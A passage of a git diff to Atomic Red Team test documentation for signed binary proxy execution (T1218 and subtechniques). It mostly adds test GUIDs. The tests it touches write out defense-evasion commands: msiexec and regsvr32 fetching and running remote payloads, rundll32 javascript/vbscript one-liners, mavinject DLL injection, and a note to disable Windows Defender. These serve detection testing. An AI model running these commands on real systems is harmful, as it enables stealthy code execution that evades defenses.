## Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler -Executes an HTA Application with JScript Engine and Inline Protocol Handler. +auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 + +Executes an HTA Application with JScript Engine and Inline Protocol Handler. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe| | script_engine | Script Engine to use | string | JScript| @@ -334,7 +350,7 @@ Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -348,15 +364,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path -Executes an HTA Application with Simulate lateral movement over UNC Path. +auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362 + +Executes an HTA Application with Simulate lateral movement over UNC Path. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe| @@ -377,7 +395,7 @@ Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_fil ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md index 44f8b860..e6629801 100644 --- a/atomics/T1218.007/T1218.007.md +++ b/atomics/T1218.007/T1218.007.md @@ -16,15 +16,17 @@ Adversaries may abuse msiexec.exe to launch local or network accessible MSI file
## Atomic Test #1 - Msiexec.exe - Execute Local MSI file -Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. +auto_generated_guid: 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8 + +Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\Win32\T1218.msi| @@ -43,7 +45,7 @@ msiexec.exe /q /i "#{msi_payload}" ##### Description: T1218.msi must exist on disk at specified location (#{msi_payload}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{msi_payload}) {exit 0} else {exit 1} +if (Test-Path #{msi_payload}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -57,15 +59,17 @@ Write-Host "You must provide your own MSI"
## Atomic Test #2 - Msiexec.exe - Execute Remote MSI file -Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. +auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649 + +Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/Win32/T1218.msi| @@ -86,17 +90,19 @@ msiexec.exe /q /i "#{msi_payload}"
## Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL + +auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec + Execute arbitrary DLL file stored locally. Commonly seen in application installation. Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder. By default, if the src folder is not in place, it will download the 64 bit version. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218.007\src\x64\T1218.dll| @@ -115,7 +121,7 @@ msiexec.exe /y "#{dll_payload}" ##### Description: T1218.dll must exist on disk at specified location (#{dll_payload}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.008/T1218.008.md b/atomics/T1218.008/T1218.008.md index be140831..a05669ab 100644 --- a/atomics/T1218.008/T1218.008.md +++ b/atomics/T1218.008/T1218.008.md @@ -13,15 +13,17 @@ Adversaries may abuse odbcconf.exe to bypass application control solutions that
## Atomic Test #1 - Odbcconf.exe - Execute Arbitrary DLL -Execute arbitrary DLL file stored locally. +auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2 + +Execute arbitrary DLL file stored locally. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll| @@ -40,7 +42,7 @@ odbcconf.exe /S /A {REGSVR "#{dll_payload}"} ##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.009/T1218.009.md b/atomics/T1218.009/T1218.009.md index 0ee1701a..14171284 100644 --- a/atomics/T1218.009/T1218.009.md +++ b/atomics/T1218.009/T1218.009.md @@ -14,15 +14,17 @@ Both utilities may be used to bypass application control through use of attribut
## Atomic Test #1 - Regasm Uninstall Method Call Test -Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed. +auto_generated_guid: 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 + +Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Location of the payload | Path | %tmp%\T1218.009.dll| | source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1218.009\src\T1218.009.cs| @@ -47,7 +49,7 @@ del #{output_file} >nul 2>&1 ##### Description: The CSharp source file must exist on disk at specified location (#{source_file}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{source_file}) {exit 0} else {exit 1} +if (Test-Path #{source_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -62,16 +64,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Regsvcs Uninstall Method Call Test + +auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 + Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed along with other information about the assembly being installed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Location of the payload | Path | $Env:TEMP\T1218.009.dll| | source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1218.009\src\T1218.009.cs| @@ -102,7 +106,7 @@ Remove-Item $parentpath\T1218.009.tlb -ErrorAction Ignore | Out-Null ##### Description: The CSharp source file must exist on disk at specified location (#{source_file}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{source_file}) {exit 0} else {exit 1} +if (Test-Path #{source_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.010/T1218.010.md b/atomics/T1218.010/T1218.010.md index 043c0a8c..e63f0519 100644 --- a/atomics/T1218.010/T1218.010.md +++ b/atomics/T1218.010/T1218.010.md @@ -22,15 +22,17 @@ Regsvr32.exe can also be leveraged to register a COM Object used to establish pe
## Atomic Test #1 - Regsvr32 local COM scriptlet execution -Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. +auto_generated_guid: 449aa403-6aba-47ce-8a37-247d21ef0306 + +Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | filename | Name of the local file, include path. | Path | PathToAtomicsFolder\T1218.010\src\RegSvr32.sct| | regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| @@ -51,7 +53,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr ##### Description: Regsvr32.sct must exist on disk at specified location (#{filename}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{filename}) {exit 0} else {exit 1} +if (Test-Path #{filename}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -66,16 +68,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Regsvr32 remote COM scriptlet execution + +auto_generated_guid: c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 + Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable windows defender real-time protection to fix it. Upon execution, calc.exe will be launched. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct| | regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| @@ -98,15 +102,17 @@ windows defender real-time protection to fix it. Upon execution, calc.exe will b
## Atomic Test #3 - Regsvr32 local DLL execution -Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. +auto_generated_guid: 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b + +Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll| | regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| @@ -127,7 +133,7 @@ IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dl ##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_name}) {exit 0} else {exit 1} +if (Test-Path #{dll_name}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -142,15 +148,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Regsvr32 Registering Non DLL -Replicating observed Gozi maldoc behavior registering a dll with an altered extension +auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 + +Replicating observed Gozi maldoc behavior registering a dll with an altered extension **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_file | Path to renamed dll file to be registered | Path | %temp%\shell32.jpg| | regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| @@ -175,7 +183,7 @@ Replicating observed Gozi maldoc behavior registering a dll with an altered exte ##### Description: Test requires a renamed dll file ##### Check Prereq Commands: ```cmd -if exist #{dll_file} ( exit 0 ) else ( exit 1 ) +if exist #{dll_file} ( exit 0 ) else ( exit 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -189,15 +197,17 @@ copy "C:\Windows\System32\shell32.dll" "#{dll_file}"
## Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer -Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. +auto_generated_guid: 9d71c492-ea2e-4c08-af16-c6994cdf029f + +Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_name | Name of DLL to Install | String | PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll| | regsvr32path | Default location of Regsvr32.exe | String | C:\Windows\system32| @@ -218,7 +228,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr ##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_name}) {exit 0} else {exit 1} +if (Test-Path #{dll_name}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md index a49be86f..9af355b7 100644 --- a/atomics/T1218.011/T1218.011.md +++ b/atomics/T1218.011/T1218.011.md @@ -28,15 +28,17 @@ Rundll32 can also be used to execute scripts such as JavaScript. This can be don
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject -Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. +auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be + +Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct| @@ -57,17 +59,19 @@ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObj
## Atomic Test #2 - Rundll32 execute VBscript command + +auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb + Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution calc.exe will be launched - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | Command for rundll32.exe to execute | string | calc.exe| @@ -88,17 +92,19 @@ rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.
## Atomic Test #3 - Rundll32 advpack.dll Execution + +auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 + Test execution of a command using rundll32.exe with advpack.dll. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml Upon execution calc.exe will be launched - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011.inf| @@ -117,7 +123,7 @@ rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_Singl ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -132,18 +138,20 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Rundll32 ieadvpack.dll Execution + +auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 + Test execution of a command using rundll32.exe with ieadvpack.dll. Upon execution calc.exe will be launched Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011.inf| @@ -162,7 +170,7 @@ rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_Sin ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -177,17 +185,19 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - Rundll32 syssetup.dll Execution + +auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 + Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf| @@ -206,7 +216,7 @@ rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -221,17 +231,19 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #6 - Rundll32 setupapi.dll Execution + +auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 + Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf| @@ -250,7 +262,7 @@ rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execu ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -265,13 +277,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll + +auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 + IcedID uses this TTP as follows: rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta Trickbot uses this TTP as follows: rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript" - **Supported Platforms:** Windows @@ -295,15 +309,17 @@ rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteu
## Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll -Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. +auto_generated_guid: 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 + +Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | exe_to_launch | Path of the executable to launch | path | %windir%\System32\notepad.exe| diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index 5e7cdbfd..cc3c2998 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -24,15 +24,17 @@
## Atomic Test #1 - mavinject - Inject DLL into running process -Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. +auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61 + +Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_id | PID of process receiving injection | string | 1000| | dll_payload | DLL to inject | Path | PathToAtomicsFolder\T1218\src\x64\T1218.dll| @@ -52,7 +54,7 @@ mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} ##### Description: T1218.dll must exist on disk at specified location (#{dll_payload}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -67,15 +69,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code -Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. +auto_generated_guid: d590097e-d402-44e2-ad72-2c6aa1ce78b1 + +Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | powershell_code | PowerShell code to execute | string | Start-Process calc.exe| @@ -96,15 +100,17 @@ SyncAppvPublishingServer.exe "n; #{powershell_code}"
## Atomic Test #3 - Register-CimProvider - Execute evil dll -Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB +auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 + +Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll| @@ -123,7 +129,7 @@ C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} ##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -138,17 +144,19 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - InfDefaultInstall.exe .inf Execution + +auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef + Test execution of a .inf using InfDefaultInstall.exe Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf| @@ -167,7 +175,7 @@ InfDefaultInstall.exe #{inf_to_execute} ##### Description: INF file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -182,15 +190,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File -Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. +auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 + +Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx| @@ -210,7 +220,7 @@ call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" ##### Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided ##### Check Prereq Commands: ```powershell -if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} +if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -224,15 +234,17 @@ write-host "Install Microsoft Word or provide correct path."
## Atomic Test #6 - Microsoft.Workflow.Compiler.exe Payload Execution -Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe +auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e + +Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml| | mwcpath | Default location of Microsoft.Workflow.Compiler.exe | Path | C:\Windows\Microsoft.NET\Framework64\v4.0.30319| @@ -253,7 +265,7 @@ Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly tha ##### Description: .Net must be installed for this test to work correctly. ##### Check Prereq Commands: ```powershell -if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} +if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -267,15 +279,17 @@ write-host ".Net must be installed for this test to work correctly."
## Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions -Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe +auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911 + +Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml| | renamed_binary | renamed Microsoft.Workflow.Compiler | path | PathToAtomicsFolder\T1218\src\svchost.exe| @@ -298,7 +312,7 @@ Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net as ##### Check Prereq Commands: ```powershell Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force -if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} +if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -312,6 +326,9 @@ write-host "you need to rename workflow complier before you run this test"
## Atomic Test #8 - Invoke-ATHRemoteFXvGPUDisablementCommand base test + +auto_generated_guid: 9ebe7901-7edf-45c0-b5c7-8366300919db + RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted. @@ -321,14 +338,13 @@ Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts. Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | module_name | Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified. | string | foo| | module_path | Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules. | string | $PWD| @@ -350,7 +366,7 @@ Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md index e569b4f2..b22acd43 100644 --- a/atomics/T1219/T1219.md +++ b/atomics/T1219/T1219.md @@ -18,8 +18,10 @@ Admin tools such as TeamViewer have been used by several 